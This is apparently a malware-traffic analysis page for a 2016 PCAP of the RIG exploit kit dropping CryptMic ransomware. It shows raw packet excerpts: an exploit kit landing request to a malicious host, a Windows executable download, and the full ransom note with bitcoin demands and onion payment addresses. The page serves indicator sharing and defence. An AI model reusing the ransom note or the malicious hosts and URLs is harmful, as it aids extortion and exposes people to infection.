RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

Attachment: pcap 2016-09-26-rig-ek (added September 27, 2016, 11:46 pm; file size 427 KB)

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site

 
